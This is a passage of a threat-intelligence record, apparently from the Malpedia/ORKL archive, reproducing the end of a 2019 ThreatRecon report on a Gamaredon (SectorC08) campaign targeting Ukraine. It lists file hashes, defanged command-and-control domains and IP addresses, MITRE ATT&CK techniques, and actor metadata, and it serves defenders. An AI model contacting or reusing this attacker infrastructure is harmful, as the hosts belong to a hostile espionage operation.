14\n\nF7E74C7FBA99E1F500A37145ADBDE8F62E3811D50E85330EBFE8B13F1C4B90CF\r\n73E3732EB46A05C1D5E4ED57F222B195C4C3AF4A2E5B9F2FBA37762F79BAF222\r\nDomain\r\nhxxp://wincreator[.]ddns[.]net\r\nhxxp://bitwork[.]ddns[.]net\r\nhxxp://winrouts[.]ddns[.]net\r\nhxxp://widusk[.]ddns[.]net\r\nhxxp://workusb[.]ddns[.]net\r\nhxxp://torrent-videos[.]ddns[.]net\r\nhxxp://sprs-files[.]ddns[.]net\r\nhxxp://sprs-updates[.]ddns[.]net\r\nhxxp://spread-new[.]ddns[.]net\r\nhxxp://drop-new[.]ddns[.]net\r\nhxxp://telo-spread[.]ddns[.]net\r\nhxxp://dropdrop[.]ddns[.]net\r\nhxxp://bitvers[.]ddns[.]net\r\nhxxp://my-certificates[.]ddns[.]net\r\nhxxp://kristousb[.]ddns[.]net\r\nhxxp://my-work[.]ddns[.]net\r\nhxxp://spr-d2[.]ddns[.]net\r\nhxxp://military-ua[.]ddns[.]net\r\nhxxp://bitlocker[.]ddns[.]net\r\nhxxp://const-gov[.]ddns[.]net\r\nhxxp://tor-file[.]ddns[.]net\r\nhxxp://torrent-vnc[.]ddns[.]net\r\nhxxp://versiya-spread[.]myftp[.]org\r\nhxxp://spread[.]crimea[.]com\r\nhxxp://dropper[.]crimea[.]com\r\nhxxp://torrent-stel[.]space\r\nhxxp://torrent-supd[.]space\r\nIP Addresses\r\n5[.]23[.]55[.]212\r\n80[.]211[.]167[.]231\r\n84[.]78[.]25[.]153\r\n91[.]226[.]81[.]235\r\n94[.]154[.]11[.]23\r\n95[.]142[.]45[.]48\r\n142[.]93[.]110[.]250\r\n185[.]158[.]115[.]137\r\n185[.]158[.]114[.]95\r\n185[.]231[.]154[.]122\r\n185[.]231[.]154[.]154\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 12 of 14\n\n185[.]231[.]155[.]12\r\n185[.]231[.]155[.]69\r\n185[.]231[.]155[.]209\r\n185[.]248[.]100[.]104\r\n185[.]248[.]100[.]121\r\n185[.]248[.]100[.]142\r\n193[.]19[.]118[.]65\r\n193[.]19[.]118[.]238\r\n195[.]2[.]253[.]218\r\n195[.]62[.]52[.]91\r\n195[.]62[.]52[.]119\r\n195[.]62[.]52[.]160\r\n195[.]62[.]52[.]164\r\n195[.]62[.]53[.]158\r\n195[.]88[.]208[.]26\r\n195[.]88[.]208[.]51\r\n195[.]88[.]208[.]133\r\n195[.]88[.]208[.]157\r\n195[.]88[.]209[.]136\r\nMITRE ATT\u0026CK Techniques\r\nThe following is a list of MITRE ATT\u0026CK Techniques we have observed based on our analysis of these malware.\r\nInitial Access\r\nT1091 Replication Through Removable Media\r\nT1193 Spearphishing Attachment\r\nExecution\r\nT1059 Command-Line Interface\r\nT1085 Rundll32\r\nT1053 Scheduled Task\r\nT1064 Scripting\r\nT1204 User Execution\r\nT1047 Windows Management Instrumentation\r\nPersistence\r\nT1158 Hidden Files and Directories\r\nT1060 Registry Run Keys / Startup Folder\r\nT1053 Scheduled Task\r\nT1023 Shortcut Modification\r\nDefense Evasion\r\nT1158 Hidden Files and Directories\r\nT1036 Masquerading\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 13 of 14\n\nT1085 Rundll32\r\nT1064 Scripting\r\nT1027 Obfuscated Files or Information\r\nDiscovery\r\nT1057 Process Discovery\r\nT1012 Query Registry\r\nT1082 System Information Discovery\r\nT1016 System Network Configuration Discovery\r\nT1124 System Time Discovery\r\nT1497 Virtualization/Sandbox Evasion\r\nCommand and Control\r\nT1043 Commonly Used Port\r\nT1065 Uncommonly Used Port\r\nT1219 Remote Access Tools\r\nT1071 Standard Application Layer Protocol\r\nSource: https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/"
	],
	"report_names": [
		"sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine"
	],
	"threat_actors": [
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434170,
	"ts_updated_at": 1775792141,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9cd65052f9dc3d8fddfaaa426a551635a78d0d73.pdf",
		"text": "https://archive.orkl.eu/9cd65052f9dc3d8fddfaaa426a551635a78d0d73.txt",
		"img": "https://archive.orkl.eu/9cd65052f9dc3d8fddfaaa426a551635a78d0d73.jpg"
	}
}